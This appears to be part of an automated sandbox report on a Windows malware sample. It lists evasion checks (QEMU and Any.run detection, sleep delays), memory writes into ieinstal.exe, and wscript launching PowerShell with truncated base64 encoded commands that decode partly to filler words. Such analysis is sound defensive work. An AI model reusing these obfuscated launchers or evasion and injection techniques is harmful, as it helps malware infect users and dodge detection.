    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Tries to detect Any.run
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7480Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 392Thread sleep count: 81 > 30Jump to behavior
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 392Thread sleep time: -6075000s >= -30000sJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ppgnlr3u\ppgnlr3u.dllJump to dropped file
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8057Jump to behavior
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeThread delayed: delay time: 75000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: ModuleInformationJump to behavior
    Source: ieinstal.exe, 00000009.00000002.8458764109.0000000002BBE000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000002.8457496133.0000000002B79000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess queried: DebugPortJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Writes to foreign memory regions
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 630000Jump to behavior
    Encrypted powershell cmdline option found
    Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded #Disdai Dishuma5 Sort TAFFE Crampoond GRUNTINGB Preambulat3 Assimil6 Fursemideb Furiensdec Alarmure2 Chorib HUMO FISTELSTEM Stege chesse barrymor Anngrethe3 #Remingli4 ernr Bespyt Sulphozin8 VIRGULA IFRD Fore Pluralveks1 Profilenu nonfo Injust9 Nourishmen3 tomahavken Essay1 BLAA transmog hulk inlaye #kvar Kobangfor6 Hyperarc6 GARDEROBEN Oncosphere Bunglin BARYT TOMASTE CORROBORAT CYKELPAR Stadslg3 Bacilleb BLURTIN administr Milieub3 Bladele8 apometab #Peal8 King9 Opmrkerco IDELIGESI Systemat7 Preoper3 Reso SPAGNUM Land reckoni depraver fartjsfort LANN Griffonag3 AFSE hjsd analysearb AMULAS #unjolly Instrumen GLALIINGL Resoap Womani Leggier5 UNBREAKING Orillio adrea ALTOLAT Fago2 Inflammat6 COCKNEYDOM SYMPOSI gravereu FORUD FASTRESFI Kontrol SKRLEV ANALYTIKER UNCR Sortsr vidnefrs EOCARBO Takt Betvivler3 Velar #Revancher Wordables lousierma indlogrbrn Atta REBLOWNGU QUEBRITHC GRNSEOVERG frytlernes LEMPELIGES #andelss Camballm4 Sortering Lngstleven outboxe SIGNIFICAT Mana DUNKARD Unscor tronb hypohemiag MATTESTE engros Feri2 UNCONVE Mindstehj Nitrogen chev Korp6 stted miskred umenneske Galoplo Udskriv2 MAGNETOMET TRILLIONTH HAARBRSTE Immatc6 drueh Ssla Countryro2 Nonex #Alisphen sula idmmel Tribrac2 Tilegnel Unde dksd tujasur Circ8 Broo Appe1 Oksehude netstroem Teknolog2 klore BALLADR UNFLUTTERE boyko Tilbringe physi FELWO Generisktv5 Sukke Lodgeart3 #Unevada Enceph2 poleremi zakariass scoll Boatl7 Samar Hutchi acetanion INTE Stubb alde Lambk Nonretra Skan
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: Base64 decoded #meso dittog stjerthage Prevaricat1 Pyrol6 delumini Tastear7 tropo engr nonrepenta #Smitty1 SPRENG UNVIS Allerhv Archip9 RINGMRKNI Uncon9 JENBRY Ejakule STJER KOMMUNIK Sortk8 phae Uqvsy Monop3 Countercl1 baalambs Explosibl EPIGR Cephalohum tegnt GPSEMULS Aflaas6 Asbk6 #abidi Peng9 apha Caulkers TRFFE Typhoonto3 krapinaf Enligsti2 Sankthans Gennem8 Celiec6 Katj #Epilepsien SEMISOLU sprednin METHY Parame Brnehave2 GERMANIST DRETSS ENSPORETH Stedmod7 Svovlsyre Borgerr Kolport1 pleurot #bonsai Pseudo fritidscen TEATERGN PLANERS VINDM Spalte Tabel2 Ambadeedie Cindersban Coatt3 CHROMAT carl Stift1 stvfn Kommuna3 RRTAN Nonoil #septenat Pseudoamb8 Nonracia Vlgeresk3 Dogho Programm FLUGTSKYD claust SELVFIN #dispens AFFALDSP Plnerner Gordykn1 Bioel Rhiz Nonadja9 Bris2 STUD korporligt Charcuti2 Maltingpe6 Sikkerh3 UNITINGIN disens #SPIS strykni Treasure2 freez Disorde Cifferfl metages Ustemp efterkomm Synsms4 LNSLAVESR Cats4 sovs Wins Precepta7 TARSOMAL Obsternasi4 EFTERTR Bleskud2 #woolensr PLOCEIFORM Rauno TYPER innuendo RAPP Bogstavk ubes Absinth Forsknin HOTELVRT Skinn bedriften BROK forskudsb Misi Auma6 Mossernes #Hemihyperi Aikos makrofu pillmaking Habanerasd Trol6 RYGTIKAMPE TRFLERNEPO modstands Dynami pulvin Hysterecto1 Mtni chart LEMMATAAN Knsk6 filstrukt #KOERSLE STYREVARIA Blnde Sedim4 CROS DUELLERE krummesu Pseudop sher Standhaf forve Skatteafde REVERSA TRILLIONTA Prrie Hvid Damr1 Unsu9 sanjaspew flyde LINGUOVERS Respo9 #tilf Shotgunaf6 Zuniss2 b
    Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded #Disdai Dishuma5 Sort TAFFE Crampoond GRUNTINGB Preambulat3 Assimil6 Fursemideb Furiensdec Alarmure2 Chorib HUMO FISTELSTEM Stege chesse barrymor Anngrethe3 #Remingli4 ernr Bespyt Sulphozin8 VIRGULA IFRD Fore Pluralveks1 Profilenu nonfo Injust9 Nourishmen3 tomahavken Essay1 BLAA transmog hulk inlaye #kvar Kobangfor6 Hyperarc6 GARDEROBEN Oncosphere Bunglin BARYT TOMASTE CORROBORAT CYKELPAR Stadslg3 Bacilleb BLURTIN administr Milieub3 Bladele8 apometab #Peal8 King9 Opmrkerco IDELIGESI Systemat7 Preoper3 Reso SPAGNUM Land reckoni depraver fartjsfort LANN Griffonag3 AFSE hjsd analysearb AMULAS #unjolly Instrumen GLALIINGL Resoap Womani Leggier5 UNBREAKING Orillio adrea ALTOLAT Fago2 Inflammat6 COCKNEYDOM SYMPOSI gravereu FORUD FASTRESFI Kontrol SKRLEV ANALYTIKER UNCR Sortsr vidnefrs EOCARBO Takt Betvivler3 Velar #Revancher Wordables lousierma indlogrbrn Atta REBLOWNGU QUEBRITHC GRNSEOVERG frytlernes LEMPELIGES #andelss Camballm4 Sortering Lngstleven outboxe SIGNIFICAT Mana DUNKARD Unscor tronb hypohemiag MATTESTE engros Feri2 UNCONVE Mindstehj Nitrogen chev Korp6 stted miskred umenneske Galoplo Udskriv2 MAGNETOMET TRILLIONTH HAARBRSTE Immatc6 drueh Ssla Countryro2 Nonex #Alisphen sula idmmel Tribrac2 Tilegnel Unde dksd tujasur Circ8 Broo Appe1 Oksehude netstroem Teknolog2 klore BALLADR UNFLUTTERE boyko Tilbringe physi FELWO Generisktv5 Sukke Lodgeart3 #Unevada Enceph2 poleremi zakariass scoll Boatl7 Samar Hutchi acetanion INTE Stubb alde Lambk Nonretra SkanJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: Base64 decoded #meso dittog stjerthage Prevaricat1 Pyrol6 delumini Tastear7 tropo engr nonrepenta #Smitty1 SPRENG UNVIS Allerhv Archip9 RINGMRKNI Uncon9 JENBRY Ejakule STJER KOMMUNIK Sortk8 phae Uqvsy Monop3 Countercl1 baalambs Explosibl EPIGR Cephalohum tegnt GPSEMULS Aflaas6 Asbk6 #abidi Peng9 apha Caulkers TRFFE Typhoonto3 krapinaf Enligsti2 Sankthans Gennem8 Celiec6 Katj #Epilepsien SEMISOLU sprednin METHY Parame Brnehave2 GERMANIST DRETSS ENSPORETH Stedmod7 Svovlsyre Borgerr Kolport1 pleurot #bonsai Pseudo fritidscen TEATERGN PLANERS VINDM Spalte Tabel2 Ambadeedie Cindersban Coatt3 CHROMAT carl Stift1 stvfn Kommuna3 RRTAN Nonoil #septenat Pseudoamb8 Nonracia Vlgeresk3 Dogho Programm FLUGTSKYD claust SELVFIN #dispens AFFALDSP Plnerner Gordykn1 Bioel Rhiz Nonadja9 Bris2 STUD korporligt Charcuti2 Maltingpe6 Sikkerh3 UNITINGIN disens #SPIS strykni Treasure2 freez Disorde Cifferfl metages Ustemp efterkomm Synsms4 LNSLAVESR Cats4 sovs Wins Precepta7 TARSOMAL Obsternasi4 EFTERTR Bleskud2 #woolensr PLOCEIFORM Rauno TYPER innuendo RAPP Bogstavk ubes Absinth Forsknin HOTELVRT Skinn bedriften BROK forskudsb Misi Auma6 Mossernes #Hemihyperi Aikos makrofu pillmaking Habanerasd Trol6 RYGTIKAMPE TRFLERNEPO modstands Dynami pulvin Hysterecto1 Mtni chart LEMMATAAN Knsk6 filstrukt #KOERSLE STYREVARIA Blnde Sedim4 CROS DUELLERE krummesu Pseudop sher Standhaf forve Skatteafde REVERSA TRILLIONTA Prrie Hvid Damr1 Unsu9 sanjaspew flyde LINGUOVERS Respo9 #tilf Shotgunaf6 Zuniss2 bJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBEAGkAcwBkAGEAaQAgAEQAaQBzAGgAdQBtAGEANQAgAFMAbwByAHQAIABUAEEARgBGAEUAIABDAHIAYQBtAHAAbwBvAG4AZAAgAEcAUgBVAE4AVABJAE4ARwBCACAAUAByAGUAYQBtAGIAdQBsAGEAdAAzACAAQQBzAHMAaQBtAGkAbAA2ACAARgB1AHIAcwBlAG0AaQBkAGUAYgAgAEYAdQByAGkAZQBuAHMAZABlAGMAIABBAGwAYQByAG0AdQByAGUAMgAgAEMAaABvAHIAaQBiACAASABVAE0ATwAgAEYASQBTAFQARQBMAFMAVABFAE0AIABTAHQAZQBnAGUAIABjAGgAZQBzAHMAZQAgAGIAYQByAHIAeQBtAG8AcgAgAEEAbgBuAGcAcgBlAHQAaABlADMAIAANAAoAIwBSAGUAbQBpAG4AZwBsAGkANAAgAGUAcgBuAHIAIABCAGUAcwBwAHkAdAAgAFMAdQBsAHAAaABvAHoAaQBuADgAIABWAEkAUgBHAFUATABBACAASQBGAFIARAAgAEYAbwByAGUAIABQAGwAdQByAGEAbAB2AGUAawBzADEAIABQAHIAbwBmAGkAbABlAG4AdQAgAG4AbwBuAGYAbwAgAEkAbgBqAHUAcwB0ADkAIABOAG8AdQByAGkAcwBoAG0AZQBuADMAIAB0AG8AbQBhAGgAYQB2AGsAZQBuACAARQBzAHMAYQB5ADEAIABCAEwAQQBBACAAdAByAGEAbgBzAG0AbwBnACAAaAB1AGwAawAgAGkAbgBsAGEAeQBlACAADQAKACMAawB2AGEAcgAgAEsAbwBiAGEAbgBnAGYAbwByADYAIABIAHkAcABlAHIAYQByAGMANgAgAEcAQQBSAEQARQBSAE8AQgBFAE4AIABPAG4AYwBvAHMAcABoAGUAcgBlACAAQgB1AG4AZwBsAGkAbgAgAEIAQQBSAFkAVAAgAFQATwBNAEEAUwBUAEUAIABDAE8AUgBSAE8AQgBPAFIAQQBUACAAQwBZAEsARQBMAFAAQQBSACAAUwB0AGEAZABzAGwAZwAzACAAQgBhAGMAaQBsAGwAZQBiACAAQgBMAFUAUgBUAEkATgAgAGEAZABtAGkAbgBpAHMAdAByACAATQBpAGwAaQBlAHUAYgAzACAAQgBsAGEAZABlAGwAZQA4ACAAYQBwAG8AbQBlAHQAYQBiACAADQAKACMAUABlAGEAbAA4ACAASwBpAG4AZwA5ACAATwBwAG0AcgBrAGUAcgBjAG8AIABJAEQARQBMAEkARwBFAFMASQAgAFMAeQBzAHQAZQBtAGEAdAA3ACAAUAByAGUAbwBwAGUAcgAzACAAUgBlAHMAbwAgAFMAUABBAEcATgBVAE0AIABMAGEAbgBkACAAcgBlAGMAawBvAG4AaQAgAGQAZQBwAHIAYQB2AGUAcgAgAGYAYQByAHQAagBzAGYAbwByAHQAIABMAEEATgBOACAARwByAGkAZgBmAG8AbgBhAGcAMwAgAEEARgBTAEUAIABoAGoAcwBkACAAYQBuAGEAbAB5AHMAZQBhAHIAYgAgAEEATQBVAEwAQQBTACAADQAKACMAdQBuAGoAbwBsAGwAeQAgAEkAbgBzAHQAcgB1AG0AZQBuACAARwBMAEEATABJAEkATgBHAEwAIABSAGUAcwBvAGEAcAAgAFcAbwBtAGEAbgBpACAATABlAGcAZwBpAGUAcgA1ACAAVQBOAEIAUgBFAEEASwBJAE4ARwAgAE8AcgBpAGwAbABpAG8AIABhAGQAcgBlAGEAIABBAEwAVABPAEwAQQBUACAARgBhAGcAbwAyACAASQBuAGYAbABhAG0AbQBhAHQANgAgAEMATwBDAEsATgBFAFkARABPAE0AIABTAFkATQBQAE8AUwBJACAAZwByAGEAdgBlAHIAZQB1ACAARgBPAFIAVQBEACAARgBBAFMAVABSAEUAUwBGAEkAIABLAG8AbgB0AHIAbwBsACAAUwBLAFIATABFAFYAIABBAE4AQQBMAFkAVABJAEsARQBSACAAVQBOAEMAUgAgAFMAbwByAHQAcwByACAAdgBpAGQAbgBlAGYAcgBzACAARQBPAEMAQQBSAEIATwAgAFQAYQBrAHQAIABCAGUAdAB2AGkAdgBsAGUAcgAzACAAVgBlAGwAYQByACAADQAKACMAUgBlAHYAYQBuAGMAaABlAHIAIABXAG8AcgBkAGEAYgBsAGUAcwAgAGwAbwB1AHMAaQBlAHIAbQBhACAAaQBuAGQAbABvAGcAcgBiAHIAbgAgAEEAdAB0AGEAIABSAEUAQgBMAE8AVwBOAEcAVQAgAFEAVQBFAEIAUgBJAFQASABDACAARwBSAE4AUwBFAE8AVgBFAFIARwAgAGYAcgB5AHQAbABlAHIAbgBlAHMAIABMAEUATQBQAEUATABJAEcARQBTACAADQAKACMAYQBuAGQAZQBsAHMAcwAgAEMAYQBtAGIAYQBsAGwAbQA0ACAAUwBvAHIAdABlAHIAaQBuAGcAIABMAG4AZwBzAHQAbABlAHYAZQBuACAAbwB1AHQAYgBvAHgAZQAgAFMASQBHAE4ASQBGAEkAQwBBAFQAIABNAGEAbgBhACAARABVAE4ASwBBAFIARAAgAFUAbgBzAGMAbwByACAAdAByAG8AbgBiACAAaAB5AHAAbwBoAGUAbQBpAGEAZwAgAE0AQQBUAFQARQBTAFQARQAgAGUAbgBnAHIAbwBzACAARgBlAHIAaQAyACAAVQBOAEMATwBOAFYARQAgAE0AaQBuAGQAcwB0AGUAaABqACAATgBpAHQAcgBvAGcAZQ
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBtAGUAcwBvACAAZABpAHQAdABvAGcAIABzAHQAagBlAHIAdABoAGEAZwBlACAAUAByAGUAdgBhAHIAaQBjAGEAdAAxACAAUAB5AHIAbwBsADYAIABkAGUAbAB1AG0AaQBuAGkAIABUAGEAcwB0AGUAYQByADcAIAB0AHIAbwBwAG8AIABlAG4AZwByACAAbgBvAG4AcgBlAHAAZQBuAHQAYQAgAA0ACgAjAFMAbQBpAHQAdAB5ADEAIABTAFAAUgBFAE4ARwAgAFUATgBWAEkAUwAgAEEAbABsAGUAcgBoAHYAIABBAHIAYwBoAGkAcAA5ACAAUgBJAE4ARwBNAFIASwBOAEkAIABVAG4AYwBvAG4AOQAgAEoARQBOAEIAUgBZACAARQBqAGEAawB1AGwAZQAgAFMAVABKAEUAUgAgAEsATwBNAE0AVQBOAEkASwAgAFMAbwByAHQAawA4ACAAcABoAGEAZQAgAFUAcQB2AHMAeQAgAE0AbwBuAG8AcAAzACAAQwBvAHUAbgB0AGUAcgBjAGwAMQAgAGIAYQBhAGwAYQBtAGIAcwAgAEUAeABwAGwAbwBzAGkAYgBsACAARQBQAEkARwBSACAAQwBlAHAAaABhAGwAbwBoAHUAbQAgAHQAZQBnAG4AdAAgAEcAUABTAEUATQBVAEwAUwAgAEEAZgBsAGEAYQBzADYAIABBAHMAYgBrADYAIAANAAoAIwBhAGIAaQBkAGkAIABQAGUAbgBnADkAIABhAHAAaABhACAAQwBhAHUAbABrAGUAcgBzACAAVABSAEYARgBFACAAVAB5AHAAaABvAG8AbgB0AG8AMwAgAGsAcgBhAHAAaQBuAGEAZgAgAEUAbgBsAGkAZwBzAHQAaQAyACAAUwBhAG4AawB0AGgAYQBuAHMAIABHAGUAbgBuAGUAbQA4ACAAQwBlAGwAaQBlAGMANgAgAEsAYQB0AGoAIAANAAoAIwBFAHAAaQBsAGUAcABzAGkAZQBuACAAUwBFAE0ASQBTAE8ATABVACAAcwBwAHIAZQBkAG4AaQBuACAATQBFAFQASABZACAAUABhAHIAYQBtAGUAIABCAHIAbgBlAGgAYQB2AGUAMgAgAEcARQBSAE0AQQBOAEkAUwBUACAARABSAEUAVABTAFMAIABFAE4AUwBQAE8AUgBFAFQASAAgAFMAdABlAGQAbQBvAGQANwAgAFMAdgBvAHYAbABzAHkAcgBlACAAQgBvAHIAZwBlAHIAcgAgAEsAbwBsAHAAbwByAHQAMQAgAHAAbABlAHUAcgBvAHQAIAANAAoAIwBiAG8AbgBzAGEAaQAgAFAAcwBlAHUAZABvACAAZgByAGkAdABpAGQAcwBjAGUAbgAgAFQARQBBAFQARQBSAEcATgAgAFAATABBAE4ARQBSAFMAIABWAEkATgBEAE0AIABTAHAAYQBsAHQAZQAgAFQAYQBiAGUAbAAyACAAQQBtAGIAYQBkAGUAZQBkAGkAZQAgAEMAaQBuAGQAZQByAHMAYgBhAG4AIABDAG8AYQB0AHQAMwAgAEMASABSAE8ATQBBAFQAIABjAGEAcgBsACAAUwB0AGkAZgB0ADEAIABzAHQAdgBmAG4AIABLAG8AbQBtAHUAbgBhADMAIABSAFIAVABBAE4AIABOAG8AbgBvAGkAbAAgAA0ACgAjAHMAZQBwAHQAZQBuAGEAdAAgAFAAcwBlAHUAZABvAGEAbQBiADgAIABOAG8AbgByAGEAYwBpAGEAIABWAGwAZwBlAHIAZQBzAGsAMwAgAEQAbwBnAGgAbwAgAFAAcgBvAGcAcgBhAG0AbQAgAEYATABVAEcAVABTAEsAWQBEACAAYwBsAGEAdQBzAHQAIABTAEUATABWAEYASQBOACAADQAKACMAZABpAHMAcABlAG4AcwAgAEEARgBGAEEATABEAFMAUAAgAFAAbABuAGUAcgBuAGUAcgAgAEcAbwByAGQAeQBrAG4AMQAgAEIAaQBvAGUAbAAgAFIAaABpAHoAIABOAG8AbgBhAGQAagBhADkAIABCAHIAaQBzADIAIABTAFQAVQBEACAAawBvAHIAcABvAHIAbABpAGcAdAAgAEMAaABhAHIAYwB1AHQAaQAyACAATQBhAGwAdABpAG4AZwBwAGUANgAgAFMAaQBrAGsAZQByAGgAMwAgAFUATgBJAFQASQBOAEcASQBOACAAZABpAHMAZQBuAHMAIAANAAoAIwBTAFAASQBTACAAcwB0AHIAeQBrAG4AaQAgAFQAcgBlAGEAcwB1AHIAZQAyACAAZgByAGUAZQB6ACAARABpAHMAbwByAGQAZQAgAEMAaQBmAGYAZQByAGYAbAAgAG0AZQB0AGEAZwBlAHMAIABVAHMAdABlAG0AcAAgAGUAZgB0AGUAcgBrAG8AbQBtACAAUwB5AG4AcwBtAHMANAAgAEwATgBTAEwAQQBWAEUAUwBSACAAQwBhAHQAcwA0ACAAcwBvAHYAcwAgAFcAaQBuAHMAIABQAHIAZQBjAGUAcAB0AGEANwAgAFQAQQBSAFMATwBNAEEATAAgAE8AYgBzAHQAZQByAG4AYQBzAGkANAAgAEUARgBUAEUAUgBUAFIAIABCAGwAZQBzAGsAdQBkADIAIAANAAoAIwB3AG8AbwBsAGUAbgBzAHIAIABQAEwATwBDAEUASQBGAE8AUgBNACAAUgBhAHUAbgBvACAAVABZAFAARQBSACAAaQBuAG4AdQBlAG4AZABvACAAUgBBAFAAUAAgAEIAbwBnAHMAdABhAHYAawAgAHUAYgBlAHMAIABBAGIAcwBpAG4AdABoACAARgBvAHIAcw
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBEAGkAcwBkAGEAaQAgAEQAaQBzAGgAdQBtAGEANQAgAFMAbwByAHQAIABUAEEARgBGAEUAIABDAHIAYQBtAHAAbwBvAG4AZAAgAEcAUgBVAE4AVABJAE4ARwBCACAAUAByAGUAYQBtAGIAdQBsAGEAdAAzACAAQQBzAHMAaQBtAGkAbAA2ACAARgB1AHIAcwBlAG0AaQBkAGUAYgAgAEYAdQByAGkAZQBuAHMAZABlAGMAIABBAGwAYQByAG0AdQByAGUAMgAgAEMAaABvAHIAaQBiACAASABVAE0ATwAgAEYASQBTAFQARQBMAFMAVABFAE0AIABTAHQAZQBnAGUAIABjAGgAZQBzAHMAZQAgAGIAYQByAHIAeQBtAG8AcgAgAEEAbgBuAGcAcgBlAHQAaABlADMAIAANAAoAIwBSAGUAbQBpAG4AZwBsAGkANAAgAGUAcgBuAHIAIABCAGUAcwBwAHkAdAAgAFMAdQBsAHAAaABvAHoAaQBuADgAIABWAEkAUgBHAFUATABBACAASQBGAFIARAAgAEYAbwByAGUAIABQAGwAdQByAGEAbAB2AGUAawBzADEAIABQAHIAbwBmAGkAbABlAG4AdQAgAG4AbwBuAGYAbwAgAEkAbgBqAHUAcwB0ADkAIABOAG8AdQByAGkAcwBoAG0AZQBuADMAIAB0AG8AbQBhAGgAYQB2AGsAZQBuACAARQBzAHMAYQB5ADEAIABCAEwAQQBBACAAdAByAGEAbgBzAG0AbwBnACAAaAB1AGwAawAgAGkAbgBsAGEAeQBlACAADQAKACMAawB2AGEAcgAgAEsAbwBiAGEAbgBnAGYAbwByADYAIABIAHkAcABlAHIAYQByAGMANgAgAEcAQQBSAEQARQBSAE8AQgBFAE4AIABPAG4AYwBvAHMAcABoAGUAcgBlACAAQgB1AG4AZwBsAGkAbgAgAEIAQQBSAFkAVAAgAFQATwBNAEEAUwBUAEUAIABDAE8AUgBSAE8AQgBPAFIAQQBUACAAQwBZAEsARQBMAFAAQQBSACAAUwB0AGEAZABzAGwAZwAzACAAQgBhAGMAaQBsAGwAZQBiACAAQgBMAFUAUgBUAEkATgAgAGEAZABtAGkAbgBpAHMAdAByACAATQBpAGwAaQBlAHUAYgAzACAAQgBsAGEAZABlAGwAZQA4ACAAYQBwAG8AbQBlAHQAYQBiACAADQAKACMAUABlAGEAbAA4ACAASwBpAG4AZwA5ACAATwBwAG0AcgBrAGUAcgBjAG8AIABJAEQARQBMAEkARwBFAFMASQAgAFMAeQBzAHQAZQBtAGEAdAA3ACAAUAByAGUAbwBwAGUAcgAzACAAUgBlAHMAbwAgAFMAUABBAEcATgBVAE0AIABMAGEAbgBkACAAcgBlAGMAawBvAG4AaQAgAGQAZQBwAHIAYQB2AGUAcgAgAGYAYQByAHQAagBzAGYAbwByAHQAIABMAEEATgBOACAARwByAGkAZgBmAG8AbgBhAGcAMwAgAEEARgBTAEUAIABoAGoAcwBkACAAYQBuAGEAbAB5AHMAZQBhAHIAYgAgAEEATQBVAEwAQQBTACAADQAKACMAdQBuAGoAbwBsAGwAeQAgAEkAbgBzAHQAcgB1AG0AZQBuACAARwBMAEEATABJAEkATgBHAEwAIABSAGUAcwBvAGEAcAAgAFcAbwBtAGEAbgBpACAATABlAGcAZwBpAGUAcgA1ACAAVQBOAEIAUgBFAEEASwBJAE4ARwAgAE8AcgBpAGwAbABpAG8AIABhAGQAcgBlAGEAIABBAEwAVABPAEwAQQBUACAARgBhAGcAbwAyACAASQBuAGYAbABhAG0AbQBhAHQANgAgAEMATwBDAEsATgBFAFkARABPAE0AIABTAFkATQBQAE8AUwBJACAAZwByAGEAdgBlAHIAZQB1ACAARgBPAFIAV